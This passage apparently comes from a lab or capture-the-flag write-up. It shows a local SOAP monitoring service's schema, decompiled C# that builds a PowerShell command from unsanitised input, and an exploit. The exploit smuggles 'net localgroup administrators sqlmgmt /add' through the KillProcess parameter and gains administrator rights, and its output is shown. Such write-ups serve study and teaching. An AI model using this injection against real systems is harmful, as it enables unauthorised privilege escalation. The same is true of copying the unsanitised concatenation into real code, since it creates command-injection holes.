<xs:complexType>
<xs:sequence>
<xs:element minOccurs="0" name="processName" nillable="true" type="xs:string"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="KillProcessResponse">
<xs:complexType>
<xs:sequence>
<xs:element minOccurs="0" name="KillProcessResult" nillable="true" type="xs:string"/>
</xs:sequence>
</xs:complexType>
</xs:element>
</xs:schema>

From the output with xsd=xsd0, we can clearly see the methods exposed by the service:

  1. StartMonitoring (no parameters)
  2. StopMonitoring (no parameters)
  3. KillProcess (parameter: processName, type: string)

We used the dnSpy decompilation tool to analyze the program further.

public string KillProcess(string processName)
{
    string scriptContents = "Stop-Process -Name " + processName + " -Force";
    string result;
    try
    {
        using (Runspace runspace = RunspaceFactory.CreateRunspace())
        {
            runspace.Open();
            using (Pipeline pipeline = runspace.CreatePipeline())
            {
                pipeline.Commands.AddScript(scriptContents);
                pipeline.Commands.Add("Out-String");
                Collection<PSObject> collection = pipeline.Invoke();
                runspace.Close();
                StringBuilder stringBuilder = new StringBuilder();
                foreach (PSObject psobject in collection)
                {
                    stringBuilder.AppendLine(psobject.ToString());
                }
                result = stringBuilder.ToString();
            }
        }
    }
}
$ws = New-WebServiceProxy -Uri "[http://localhost:8000/MonitorService?wsdl]"
$ws.KillProcess("notepad; net localgroup administrators sqlmgmt /add; #")
net localgroup administrators

Alias Name: administrators Comment: Administrators have complete and unrestricted access to the computer/domain.

Members:

Administrator Domain Admins Enterprise Admins sqlmgmt

The command was successful. Note: You will need to log out and then log back in to see the changes.


# Lessons Learned

WSDL: https://www.ibm.com/docs/zh-tw/app-connect/11.0.0?topic=overview-querying-wsdl-wsdl
SOAP: https://www.runoob.com/soap/soap-syntax.html